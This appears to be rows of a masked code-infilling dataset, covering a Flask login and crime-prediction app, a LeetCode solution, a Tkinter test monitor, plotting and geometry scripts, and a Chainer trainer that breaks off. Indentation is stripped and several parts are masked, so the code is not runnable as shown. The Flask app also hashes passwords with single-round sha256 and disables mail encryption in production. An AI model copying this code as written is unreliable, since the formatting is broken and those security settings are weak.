return render_template('learn_more.html')
<mask token>
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
<mask token>
@app.route('/reset_password/<token>', methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid / expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method
='sha256')
user.password = hashed_password
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('login'))
    return render_template('reset_token.html', title='Reset Password', form=form
)
<mask token>
| <mask token>
def get_config(fname):
"""
Creates connection to yaml file which holds the DB user and pass
"""
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
if ENV == 'dev':
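    # local development: secret key and mail credentials come from config.yml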
cfg = get_config('config.yml')
connection = cfg['connection'][ENV]
app.config['SECRET_KEY'] = connection['secret_key']
app.debug = True
app.config[connection['username']] = connection['password']
app.config['TESTING'] = False
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = True
    app.config['MAIL_USE_SSL'] = False
app.config['MAIL_USERNAME'] = connection['mail_user']
app.config['MAIL_PASSWORD'] = connection['mail_pass']
app.config['MAIL_DEFAULT_SENDER'] = '[email protected]'
app.config['MAIL_MAX_EMAILS'] = None
app.config['MAIL_ASCII_ATTACHMENTS'] = False
else:
app.debug = False
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']
app.config['MAIL_SERVER'] = os.environ['MAIL_SERVER']
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = False
    app.config['MAIL_USE_SSL'] = False
app.config['MAIL_USERNAME'] = os.environ['MAIL_USERNAME']
app.config['MAIL_PASSWORD'] = os.environ['MAIL_PASSWORD']
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']
<mask token>
Bootstrap(app)
<mask token>
login_manager.init_app(app)
<mask token>
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
def get_reset_token(self, expires_seconds=1800):
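        # issue a signed, time-limited token that embeds this user's id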
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id': self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
except:
return None
        return User.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
password = PasswordField('Password', validators=[InputRequired(),
Length(min=8, max=80)])
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
username = StringField('UserName', validators=[InputRequired(), Length(
min=4, max=15)])
submit = SubmitField('Update')
def validate_username(self, username):
"""
Raises a validation error if a user tries to register using an existing username
"""
if username.data != current_user.username:
user = User.query.filter_by(username=username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators=[InputRequired(), Email(message
='Invalid Email'), Length(max=50)])
submit = SubmitField('Request Password Reset')
def validate_email(self, email):
"""
Raises a validation error if a user tries to register using an existing email
"""
if email.data != current_user.email:
user = User.query.filter_by(email=email.data).first()
if user is None:
raise ValidationError(
                'There is no account with that email. You must register first.'
)
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators=[DataRequired()])
confirm_password = PasswordField('Confirm Password', validators=[
DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/', methods=['GET', 'POST'])
def home():
return render_template('index.html')
@app.route('/error/')
def error():
return render_template('error.html')
@app.route('/login_error/')
def login_error():
return render_template('login_error.html')
@app.route('/login/', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember=form.remember.data)
                flash('Logged In As {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
@app.route('/signup/', methods=['GET', 'POST'])
def signup():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegisterForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method
='sha256')
new_user = User(username=form.username.data, email=form.email.data,
password=hashed_password)
db.session.add(new_user)
db.session.commit()
return redirect(url_for('login'))
else:
return render_template('signup.html', form=form, message=
'Username / Email Already Exists')
return render_template('signup.html', form=form)
@app.route('/logout/')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/learn_more/', methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
@app.route('/email_sent/', methods=['GET', 'POST'])
def email_sent():
return render_template('email_sent.html')
@app.route('/account/', methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('Your account has been updated', 'success')
return redirect(url_for('account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
return render_template('account.html', title='Account', form=form)
@app.route('/model_page/', methods=['GET', 'POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
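    # email a one-time password-reset link built from the user's signed token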
token = user.get_reset_token()
msg = Message(subject='Password Reset Request', sender=
'[email protected]', recipients=[user.email])
msg.body = f""" To reset your password, visit the following link :
{url_for('reset_token', token=token, _external=True)}
If you did not make this request then simply ignore this email and no changes will be made.
"""
mail.send(msg)
@app.route('/reset_password/', methods=['GET', 'POST'])
def reset_request():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RequestResetForm()
if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()
        send_reset_email(user)
        flash(
            'An email has been sent with instructions to reset your password',
            'info')
return redirect(url_for('login'))
    return render_template('reset_request.html', title='Reset Password',
form=form)
@app.route('/reset_password/<token>', methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid / expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method
='sha256')
user.password = hashed_password
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('login'))
    return render_template('reset_token.html', title='Reset Password', form=form
)
@app.route('/predict_model', methods=['GET', 'POST'])
def predict_model():
int_features = [int(x) for x in request.form.values()]
final_features = [np.array(int_features)]
prediction = model.predict(final_features)
output = round(prediction[0], 2)
    map_dict = {1: 'DT Toronto', 3: 'North York', 4: 'Scarborough',
        6: 'Etobicoke'}
output = map_dict[output]
return render_template('model_page.html', prediction_text=
'The Crime Occurred in : {}'.format(output))
if __name__ == '__main__':
if ENV == 'prod':
app.run()
else:
app.run(debug=True)
| import numpy as np
import yaml
import pickle
import os
from flask import Flask, request, jsonify, render_template, redirect, url_for, flash
from flask_mail import Mail, Message
from flask_wtf import FlaskForm
from flask_sqlalchemy import SQLAlchemy
from flask_bootstrap import Bootstrap
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import ValidationError, DataRequired, EqualTo
from wtforms.validators import InputRequired, Email, Length
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import LoginManager, UserMixin, login_user, login_required, logout_user, current_user
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
app = Flask(__name__)
model = pickle.load(open('model_GB.pkl', 'rb'))
ENV = 'prod'
def get_config(fname):
'''
    Loads the yaml config file which holds the secret key and mail credentials
'''
with open(fname) as f:
cfg = yaml.load(f, Loader=yaml.SafeLoader)
return cfg
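# Expected config.yml shape, inferred from the lookups below (illustrative only):
# connection:
#   dev:
#     secret_key: ...
#     username: ...
#     password: ...
#     mail_user: ...
#     mail_pass: ...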
if ENV == 'dev':
cfg = get_config('config.yml')
connection = cfg['connection'][ENV]
app.config['SECRET_KEY'] = connection['secret_key']
app.debug = True
app.config[connection['username']] = connection['password']
app.config['TESTING'] = False
app.config['MAIL_SERVER'] = 'smtp.gmail.com'
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = True
    app.config['MAIL_USE_SSL'] = False
app.config['MAIL_USERNAME'] = connection['mail_user']
app.config['MAIL_PASSWORD'] = connection['mail_pass']
app.config['MAIL_DEFAULT_SENDER'] = '[email protected]'
app.config['MAIL_MAX_EMAILS'] = None
app.config['MAIL_ASCII_ATTACHMENTS'] = False
else:
app.debug = False
app.config['SECRET_KEY'] = os.environ['SECRET_KEY']
app.config['MAIL_SERVER'] = os.environ['MAIL_SERVER']
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = False
    app.config['MAIL_USE_SSL'] = False
app.config['MAIL_USERNAME'] = os.environ['MAIL_USERNAME']
app.config['MAIL_PASSWORD'] = os.environ['MAIL_PASSWORD']
app.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
mail = Mail(app)
Bootstrap(app)
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(15), unique=True)
email = db.Column(db.String(50), unique=True)
password = db.Column(db.String(80))
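    # Password-reset helpers: get_reset_token() signs the user id with the app
    # secret via itsdangerous; verify_reset_token() returns the User or None.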
def get_reset_token(self, expires_seconds = 1800):
s = Serializer(app.config['SECRET_KEY'], expires_seconds)
return s.dumps({'user_id' : self.id}).decode('utf-8')
@staticmethod
def verify_reset_token(token):
s = Serializer(app.config['SECRET_KEY'])
try:
user_id = s.loads(token)['user_id']
        except Exception:
            return None
        return User.query.get(user_id)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class LoginForm(FlaskForm):
username = StringField('UserName', validators = [InputRequired(), Length(min = 4, max = 15)])
password = PasswordField('Password', validators = [InputRequired(), Length(min = 8, max = 80)])
remember = BooleanField('Remember Me')
class RegisterForm(FlaskForm):
email = StringField('email', validators = [InputRequired(), Email(message = 'Invalid Email'), Length(max = 50)])
username = StringField('UserName', validators = [InputRequired(), Length(min = 4, max = 15)])
password = PasswordField('Password', validators = [InputRequired(), Length(min = 8, max = 80)])
def validate_username(self, username):
'''
Raises a validation error if a user tries to register using an existing username
'''
user = User.query.filter_by(username = username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
'''
Raises a validation error if a user tries to register using an existing email
'''
user = User.query.filter_by(email = email.data).first()
if user:
raise ValidationError('Email Taken')
class UpdateAccountForm(FlaskForm):
email = StringField('email', validators = [InputRequired(), Email(message = 'Invalid Email'), Length(max = 50)])
username = StringField('UserName', validators = [InputRequired(), Length(min = 4, max = 15)])
submit = SubmitField('Update')
def validate_username(self, username):
'''
        Raises a validation error if the chosen username is already taken by another user
'''
if username.data != current_user.username:
user = User.query.filter_by(username = username.data).first()
if user:
raise ValidationError('Username Taken')
def validate_email(self, email):
'''
        Raises a validation error if the chosen email is already taken by another user
'''
if email.data != current_user.email:
user = User.query.filter_by(email = email.data).first()
if user:
raise ValidationError('Email Taken')
class RequestResetForm(FlaskForm):
email = StringField('email', validators = [InputRequired(), Email(message = 'Invalid Email'), Length(max = 50)])
submit = SubmitField('Request Password Reset')
    def validate_email(self, email):
        '''
        Raises a validation error if no account exists for the given email
        '''
        user = User.query.filter_by(email = email.data).first()
        if user is None:
            raise ValidationError('There is no account with that email. You must register first.')
class ResetPasswordForm(FlaskForm):
password = PasswordField('Password', validators = [DataRequired()])
confirm_password = PasswordField('Confirm Password', validators = [DataRequired(), EqualTo('password')])
submit = SubmitField('Reset Password')
@app.route('/',methods=['GET', 'POST'])
def home():
return render_template('index.html')
@app.route('/error/')
def error():
return render_template('error.html')
@app.route('/login_error/')
def login_error():
return render_template('login_error.html')
@app.route('/login/',methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username = form.username.data).first()
if user:
if check_password_hash(user.password, form.password.data):
login_user(user, remember = form.remember.data)
                flash('Logged In As {}!'.format(form.username.data))
return redirect(url_for('model_page'))
else:
return redirect(url_for('login_error'))
return render_template('login.html', form=form)
@app.route('/signup/', methods = ['GET','POST'])
def signup():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RegisterForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method = 'sha256') # sha256 will generate a hash which is 80 chars long
new_user = User(username = form.username.data, email = form.email.data, password = hashed_password)
db.session.add(new_user)
db.session.commit()
# send congrat email for registering
# msg = Message(subject = 'Welcome {}'.format(form.username.data), sender = app.config.get("MAIL_USERNAME"), recipients = [str(form.email.data)], body = 'Congratulations you have signed up and your account has been created!')
# mail.send(msg)
return redirect(url_for('login'))
    elif request.method == 'POST':
return render_template('signup.html', form = form, message= 'Username / Email Already Exists')
# return '<h1>' + form.email.data + ' ' + form.username.data + ' ' + form.password.data + '<h1>'
return render_template('signup.html', form = form)
@app.route('/logout/')
@login_required
def logout():
logout_user()
return redirect(url_for('home'))
@app.route('/learn_more/',methods=['GET', 'POST'])
def learn_more():
return render_template('learn_more.html')
@app.route('/email_sent/',methods=['GET', 'POST'])
def email_sent():
return render_template('email_sent.html')
@app.route('/account/',methods=['GET', 'POST'])
@login_required
def account():
form = UpdateAccountForm()
if form.validate_on_submit():
current_user.username = form.username.data
current_user.email = form.email.data
db.session.commit()
flash('Your account has been updated', 'success')
return redirect(url_for('account'))
elif request.method == 'GET':
form.username.data = current_user.username
form.email.data = current_user.email
return render_template('account.html', title = 'Account', form = form)
@app.route('/model_page/', methods = ['GET','POST'])
@login_required
def model_page():
return render_template('model_page.html')
def send_reset_email(user):
token = user.get_reset_token()
msg = Message(subject = 'Password Reset Request',
sender = '[email protected]',
recipients=[user.email])
msg.body = f''' To reset your password, visit the following link :
{url_for('reset_token', token = token, _external = True)}
If you did not make this request then simply ignore this email and no changes will be made.
'''
mail.send(msg)
@app.route('/reset_password/',methods=['GET', 'POST'])
def reset_request():
if current_user.is_authenticated:
return redirect(url_for('home'))
form = RequestResetForm()
if form.validate_on_submit():
        user = User.query.filter_by(email = form.email.data).first()
        send_reset_email(user)
        flash('An email has been sent with instructions to reset your password', 'info')
return redirect(url_for('login'))
    return render_template('reset_request.html', title = 'Reset Password', form = form)
@app.route('/reset_password/<token>',methods=['GET', 'POST'])
def reset_token(token):
if current_user.is_authenticated:
return redirect(url_for('home'))
user = User.verify_reset_token(token)
if user is None:
flash('That is an invalid / expired token', 'warning')
return redirect(url_for('reset_request'))
form = ResetPasswordForm()
if form.validate_on_submit():
hashed_password = generate_password_hash(form.password.data, method = 'sha256') # sha256 will generate a hash which is 80 chars long
user.password = hashed_password
db.session.commit()
flash('Your password has been updated!', 'success')
# send congrat email for registering
# msg = Message(subject = 'Welcome {}'.format(form.username.data), sender = app.config.get("MAIL_USERNAME"), recipients = [str(form.email.data)], body = 'Congratulations you have signed up and your account has been created!')
# mail.send(msg)
return redirect(url_for('login'))
    return render_template('reset_token.html', title = 'Reset Password', form = form)
@app.route('/predict_model', methods=['GET', 'POST'])
def predict_model():
int_features = [int(x) for x in request.form.values()]
final_features = [np.array(int_features)]
prediction = model.predict(final_features)
output = round(prediction[0], 2)
map_dict = {1 : 'DT Toronto', 3 : 'North York', 4 : 'Scarborough', 6 : 'Etobicoke'}
output = map_dict[output]
return render_template('model_page.html', prediction_text = 'The Crime Occurred in : {}'.format(output))
if __name__ == "__main__":
if ENV == 'prod':
app.run()
else:
app.run(debug=True)
| [
25,
26,
28,
36,
39
] |
1,664 | 3edfc1098c775fa31456aa3cc938051b2dbb8697 | <mask token>
| <mask token>
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
<mask token>
| <mask token>
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
print(Solution().findSubsequences([4, 6, 7, 7]))
| from typing import List
class Solution:
def findSubsequences(self, nums: List[int]) ->List[List[int]]:
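        # Enumerate every subsequence with an include/exclude recursion, then
        # keep the non-decreasing ones of length >= 2, de-duplicated via a set.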
res: List[List[int]] = []
s = set()
def deep(pos: int, tmp: List[int]):
if pos == len(nums):
if len(tmp) < 2:
return
for i in range(1, len(tmp)):
if tmp[i - 1] > tmp[i]:
return
if tuple(tmp) not in s:
res.append(tmp)
s.add(tuple(tmp))
else:
deep(pos + 1, tmp)
deep(pos + 1, tmp + [nums[pos]])
deep(0, [])
return res
print(Solution().findSubsequences([4, 6, 7, 7]))
| null | [
0,
2,
3,
4
] |
1,665 | 572d58eec652207e6ec5a5e1d4c2f4310f2a70f3 | import ttk
import Tkinter as tk
from rwb.runner.log import RobotLogTree, RobotLogMessages
from rwb.lib import AbstractRwbGui
from rwb.widgets import Statusbar
from rwb.runner.listener import RemoteRobotListener
NAME = "monitor"
HELP_URL="https://github.com/boakley/robotframework-workbench/wiki/rwb.monitor-User-Guide"
DEFAULT_SETTINGS = {
NAME: {
"port": 8910,
"host": "localhost",
}
}
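# these defaults are read back via self.get_setting("monitor.port") below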
class MonitorApp(AbstractRwbGui):
def __init__(self):
AbstractRwbGui.__init__(self, NAME, DEFAULT_SETTINGS)
self.wm_geometry("900x500")
port = self.get_setting("monitor.port")
print "using port", port
self.listener = RemoteRobotListener(self, port=port, callback=self._listen)
self.wm_title("rwb.monitor port: %s" % self.listener.port)
self._create_menubar()
self._create_statusbar()
self._create_notebook()
self.stack = []
self.event_id = 0
# self.status_label.configure(text="port: %s" % self.listener.port)
def _create_menubar(self):
self.menubar = tk.Menu(self)
self.configure(menu=self.menubar)
self.file_menu = tk.Menu(self.menubar, tearoff=False)
self.file_menu.add_command(label="Exit", command=self._on_exit)
self.help_menu = tk.Menu(self, tearoff=False)
self.help_menu.add_command(label="View help on the web", command=self._on_view_help)
self.help_menu.add_separator()
self.help_menu.add_command(label="About the robotframework workbench", command=self._on_about)
self.menubar.add_cascade(menu=self.file_menu, label="File", underline=0)
self.menubar.add_cascade(menu=self.help_menu, label="Help", underline=0)
def _on_view_help(self):
import webbrowser
webbrowser.open(HELP_URL)
def _on_exit(self):
self.destroy()
def _create_statusbar(self):
self.statusbar = Statusbar(self)
self.statusbar.pack(side="bottom", fill="x")
self.statusbar.add_section("port",12, "port %s" % self.listener.port)
self.statusbar.add_progress(mode="indeterminate")
# grip = ttk.Sizegrip(self.statusbar)
# grip.pack(side="right")
# self.status_label = ttk.Label(self.statusbar, text="", anchor="w")
# self.status_label.pack(side="left", fill="both", expand="true", padx=8)
# self.statusbar.pack(side="bottom", fill="x")
def _create_notebook(self):
self.notebook = ttk.Notebook(self)
self.notebook.pack(side="top", fill="both", expand=True)
self.log_tree = RobotLogTree(self.notebook, auto_open=("failed","suite","test","keyword"))
self.log_messages = RobotLogMessages(self.notebook)
self.notebook.add(self.log_tree, text="Details")
self.notebook.add(self.log_messages, text="Messages")
self.notebook.pack(side="top", fill="both", expand=True)
self.listeners = (self.log_tree, self.log_messages)
def _listen(self, cmd, *args):
self.event_id += 1
for listener in self.listeners:
listener.listen(self.event_id, cmd, args)
if cmd in ("start_test", "start_suite", "start_keyword"):
name = args[0]
cmd_type = cmd.split("_")[1]
self.stack.append((cmd_type, name))
self.update_display()
elif cmd in ("end_test", "end_suite", "end_keyword"):
cmd_type = cmd.split("_")[1]
self.stack.pop()
self.update_display()
def update_display(self):
if len(self.stack) == 1:
self.statusbar.progress_start()
elif len(self.stack) == 0:
self.statusbar.progress_stop()
s = ".".join([x[1] for x in self.stack]).strip()
self.statusbar.message(s, clear=True, lifespan=0)
if __name__ == "__main__":
app = MonitorApp()
app.mainloop()
| null | null | null | null | [
0
] |
1,666 | 670efbd9879099b24a87e19a531c4e3bbce094c6 | <mask token>
|
"""
Read all the images from a directory,
resize, rescale and rename them.
"""
| null | null | null | [
0,
1
] |
1,667 | d0e5a3a6db0e27ecf157294850a48a19750a5ac2 | <mask token>
class Session:
<mask token>
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| <mask token>
class Session:
USER_ROOT_ID = 'x-root-id'
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| class Cookies:
<mask token>
class Session:
USER_ROOT_ID = 'x-root-id'
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| class Cookies:
USER_TOKEN = 'utoken'
class Session:
USER_ROOT_ID = 'x-root-id'
class APIStatisticsCollection:
API_ACTION = 'x-stats-api-action'
DICT_PARAMS = 'x-stats-param-dict'
DICT_RESPONSE = 'x-stats-resp-dict'
SUCCESS = 'x-stats-success'
COLLECT = 'x-stats-collect'
class ParamDictPrefix:
PostKey = 'x-'
| # Cookies Keys
class Cookies:
USER_TOKEN = "utoken"
# Session Keys
class Session:
USER_ROOT_ID = "x-root-id"
class APIStatisticsCollection:
API_ACTION = "x-stats-api-action"
DICT_PARAMS = "x-stats-param-dict"
DICT_RESPONSE = "x-stats-resp-dict"
SUCCESS = "x-stats-success"
COLLECT = "x-stats-collect"
# Param Dict Prefix
class ParamDictPrefix:
PostKey = "x-" # Used in http POST params from HTML forms
| [
3,
4,
5,
6,
7
] |
1,668 | 8dfd92ab0ce0e71b41ce94bd8fcf057c8995a2a4 | <mask token>
| <mask token>
def plot3D(xValues, labels, figure=0):
minClass = min(labels)
numberOfClasses = int(max(labels) - minClass)
fig = plt.figure(figure)
ax = plt.axes(projection='3d')
colors = ['r', 'b', 'y', 'c', 'm']
for i in range(numberOfClasses + 1):
classLocation = np.argwhere(labels == i + minClass)
ax.scatter3D(xValues[classLocation, 0], xValues[classLocation, 1],
xValues[classLocation, 2])
| import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
def plot3D(xValues, labels, figure=0):
minClass = min(labels)
numberOfClasses = int(max(labels) - minClass)
fig = plt.figure(figure)
ax = plt.axes(projection='3d')
colors = ['r', 'b', 'y', 'c', 'm']
for i in range(numberOfClasses + 1):
classLocation = np.argwhere(labels == i + minClass)
ax.scatter3D(xValues[classLocation, 0], xValues[classLocation, 1],
xValues[classLocation, 2])
| import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
def plot3D(xValues, labels, figure = 0):
minClass = min(labels)
numberOfClasses = int(max(labels) - minClass)
fig = plt.figure(figure)
ax = plt.axes(projection='3d')
colors = ["r", "b", "y", "c", "m"]
for i in range(numberOfClasses+1):
classLocation = np.argwhere(labels == i+minClass)
ax.scatter3D(xValues[classLocation, 0], xValues[classLocation, 1], xValues[classLocation, 2]) #3D
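# Example call (sketch; assumes xValues is an (n, 3) array and labels an (n,)
# vector of integer class ids):
# pts = np.random.rand(60, 3)
# lbls = np.repeat([0, 1, 2], 20)
# plot3D(pts, lbls)
# plt.show()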
| null | [
0,
1,
2,
3
] |
1,669 | 4480b305a6f71ff64022f2b890998326bf402bf0 | <mask token>
| <mask token>
app = web.application(urls, globals())
| <mask token>
import web
from myapp.urls import urls
app = web.application(urls, globals())
| #coding=utf-8
'Initialize the package: load the urls mapping and create the app object'
import web
from myapp.urls import urls
app = web.application(urls, globals())
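# (web.py expects `urls` to be a flat tuple of pattern/handler pairs, e.g.
# urls = ('/', 'Index') in myapp/urls.py - shown only as an assumed sketch)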
| null | [
0,
1,
2,
3
] |
1,670 | d44d9003e9b86722a0fc1dfe958de462db9cd5f1 | <mask token>
| <mask token>
print('TRIANGULO: {:.3f}'.format(t))
<mask token>
print('CIRCULO: {:.3f}'.format(pi * c ** 2))
print('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))
print('QUADRADO: {:.3f}'.format(b ** 2))
print('RETANGULO: {:.3f}'.format(a * b))
| linha = input().split()
a = float(linha[0])
b = float(linha[1])
c = float(linha[2])
t = a * c / 2
print('TRIANGULO: {:.3f}'.format(t))
pi = 3.14159
print('CIRCULO: {:.3f}'.format(pi * c ** 2))
print('TRAPEZIO: {:.3f}'.format((a + b) * c / 2))
print('QUADRADO: {:.3f}'.format(b ** 2))
print('RETANGULO: {:.3f}'.format(a * b))
| linha = input().split()
a = float(linha[0])
b = float(linha[1])
c = float(linha[2])
t = (a*c)/2
print('TRIANGULO: {:.3f}'.format(t))
pi = 3.14159
print("CIRCULO: {:.3f}".format(pi*c**2))
print('TRAPEZIO: {:.3f}'.format( ((a+b)*c)/2 ))
print("QUADRADO: {:.3f}".format(b**2))
print("RETANGULO: {:.3f}".format(a*b)) | null | [
0,
1,
2,
3
] |
1,671 | 474700968e563d34d6a0296ec62950e2e71fe1b0 | <mask token>
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss',
'validation/main/loss'], 'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy',
'validation/main/accuracy'], 'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss',
'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
<mask token>
<mask token>
| <mask token>
class SoftMaxTrainer:
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=
False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == 'Adam':
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=
out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model,
device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
